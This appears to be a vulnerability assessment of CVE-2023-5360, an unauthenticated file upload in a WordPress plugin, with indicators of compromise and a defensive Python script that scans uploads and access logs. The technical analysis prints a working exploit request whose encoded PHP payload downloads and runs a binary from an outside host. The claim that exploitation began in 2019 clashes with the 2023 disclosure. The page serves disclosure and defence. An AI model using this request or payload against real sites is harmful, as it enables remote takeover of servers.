Attacker Value: High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2023-5360

Disclosure Date: October 31, 2023
Exploited in the Wild
Description

The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.

Technical Analysis

The Royal Elementor Addons and Templates WordPress plugin provides themes and templates that make a WordPress site aesthetically pleasing with little effort. With over 200,000 installations it is quite popular, which makes it an attractive target for opportunistic attackers.

Versions prior to 1.3.79 are vulnerable to an arbitrary file upload that results in code execution as the user running the WordPress site. Once a site has the plugin enabled, the wpr_addons_upload_file action is registered on the /wp-admin/admin-ajax.php endpoint and can be invoked with a POST request. The action is reachable without authentication and does not properly sanitize the incoming file type: the endpoint refuses an upload with the .php extension, but a PHP payload uploaded with the extension .ph$p bypasses that check and lands on the target.

Exploitation of the vulnerability is demonstrated in the following POST request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.docksal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Content-Type: multipart/form-data; boundary=---------------------------612499444778935602855148342223
Content-Length: 1078

-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="uploaded_file"; filename="WmrRA8wI.ph$p"
Content-Type: application/octet-stream

<?php system(base64_decode('Y3VybCAtc28gLi92RVNIVllzd0p2dyBodHRwOi8vMTcyLjE2LjE5OS4xMzc6ODA4MC9rQW9vd3NKYnpVRER3X2FDbFg4RDhnOyBjaG1vZCAreCAuL3ZFU0hWWXN3SnZ3OyAuL3ZFU0hWWXN3SnZ3ICY='));?>
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="action"

wpr_addons_upload_file
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="max_file_size"

6395
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="allowed_file_types"

ph$p
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="triggering_event"

click
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="wpr_addons_nonce"

aa1b436f01
-----------------------------612499444778935602855148342223--

This has been actively exploited in the wild for some time, with the first signs of exploitation dating back to December 2019.

IOCs

Adversaries have been observed dropping reverse shells under the following two filenames:

b1ack.p$hp with md5sum: 1635f34d9c1da30ff5438e06d3ea6590
wp.ph$p with md5sum: bac83f216eba23a865c591dbea427f22

That being said, I would be suspicious of any .ph$p file if the Royal Elementor Addons and Template plugin was being used in my WordPress site.

*Note: Updating the plugin to the patched version 1.3.79 won’t remove malicious payloads dropped by an attacker – so be sure to scan for unwanted footholds after patching.

The majority of the attacks appear to be coming from the following three IP Addresses:

65[.]21.22.78
2a01[:]4f9:3080:4eea::2
135[.]181.181.50
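The following triage helper is an added example, not part of the original assessment or the plugin's own code. It operationalises the indicators above after patching: it walks an uploads tree for files whose extension is a '$'-obfuscated variant of .php (the .ph$p / .p$hp shape described in the analysis), flags any file whose MD5 matches the two quoted hashes, and parses web-server access-log lines for POSTs to /wp-admin/admin-ajax.php, marking those from the three listed source IPs. The directory layout, file contents and log lines are constructed for the demonstration; the wpr_addons_upload_file action itself travels in the POST body and is therefore not visible in a standard access log, which is why the log check keys on endpoint plus source address.

```python
"""Post-patch triage helper for CVE-2023-5360 (added example, not the plugin's code).
Checks the page's IOCs: '$'-obfuscated .php filenames, two known MD5 sums, and
POSTs to admin-ajax.php from the three listed source IPs.
All sample files and log lines below are constructed for this demonstration."""
import hashlib
import os
import re
import tempfile

# MD5 sums quoted in the IOC section of the assessment.
KNOWN_MD5 = {
    "1635f34d9c1da30ff5438e06d3ea6590": "b1ack.p$hp",
    "bac83f216eba23a865c591dbea427f22": "wp.ph$p",
}
# Source IPs quoted in the assessment (defanged there, refanged here for matching).
KNOWN_SOURCES = {"65.21.22.78", "2a01:4f9:3080:4eea::2", "135.181.181.50"}

# Apache/nginx combined log format: client, ident, user, [time], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def is_obfuscated_php(filename: str) -> bool:
    """True when the extension reads 'php' once every '$' is removed but is not
    literally 'php' (covers .ph$p, .p$hp, .p$h$p; not .php itself or .ph$p3)."""
    ext = os.path.splitext(filename)[1].lower()  # includes the leading dot
    if not ext.startswith("."):
        return False
    return "$" in ext and ext[1:].replace("$", "") == "php"


def scan_uploads(root: str) -> list:
    """Walk an uploads tree; report obfuscated-PHP names and known-hash matches."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.md5(fh.read()).hexdigest()
            reasons = []
            if is_obfuscated_php(name):
                reasons.append("obfuscated-php-extension")
            if digest in KNOWN_MD5:
                reasons.append("known-hash:" + KNOWN_MD5[digest])
            if reasons:
                findings.append({"path": path, "md5": digest, "reasons": reasons})
    return findings


def suspicious_ajax_requests(lines) -> list:
    """Return every POST to admin-ajax.php, flagging those from the known sources.
    The action name is in the request body, so the log alone cannot confirm it;
    treat the unflagged hits as the review queue, the flagged ones as priority."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m.group("method") == "POST" and m.group("path").startswith("/wp-admin/admin-ajax.php"):
            hits.append({
                "ip": m.group("ip"),
                "status": m.group("status"),
                "known_source": m.group("ip") in KNOWN_SOURCES,
            })
    return hits


# Constructed access-log sample: two of the three POSTs come from listed IPs.
SAMPLE_LOG = [
    '65.21.22.78 - - [01/Nov/2023:03:14:07 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 53 "-" "curl/8.1.2"',
    '198.51.100.7 - - [01/Nov/2023:03:15:11 +0000] "GET /wp-login.php HTTP/1.1" 200 4132 "-" "Mozilla/5.0"',
    '135.181.181.50 - - [01/Nov/2023:03:16:45 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 53 "-" "python-requests/2.31"',
    '203.0.113.9 - - [01/Nov/2023:03:17:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 53 "-" "Mozilla/5.0"',
]


def demo() -> dict:
    """Build a throwaway uploads tree with constructed files and run both checks."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "2023", "11"))
        # Filename taken from the request shown in the analysis; body is a harmless placeholder.
        with open(os.path.join(root, "WmrRA8wI.ph$p"), "w") as fh:
            fh.write("<?php /* constructed placeholder, not a payload */ ?>")
        with open(os.path.join(root, "2023", "11", "photo.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xe0 constructed jpeg stub")
        files = scan_uploads(root)
    hits = suspicious_ajax_requests(SAMPLE_LOG)
    return {
        "flagged_files": len(files),
        "ajax_posts": len(hits),
        "from_known_sources": sum(1 for h in hits if h["known_source"]),
    }


if __name__ == "__main__":
    print(demo())
```

Run scan_uploads() against the real wp-content/uploads directory (and suspicious_ajax_requests() over the web server's access log) after updating to 1.3.79; a flagged file should be reviewed rather than deleted blindly, since its timestamp and contents are the starting point for scoping what else the foothold was used for.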

Attacker Value and Exploitation

  • This is super easy to exploit.
  • It’s an unauth RCE in an internet facing application with +200,000 active installations (it’s a big deal)
  • Exploited in the wild
  • The only reason I’d give it a 4/5 for Attack Value is because it doesn’t give privileged access.

CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • royal-elementor-addons

Products

  • royal elementor addons
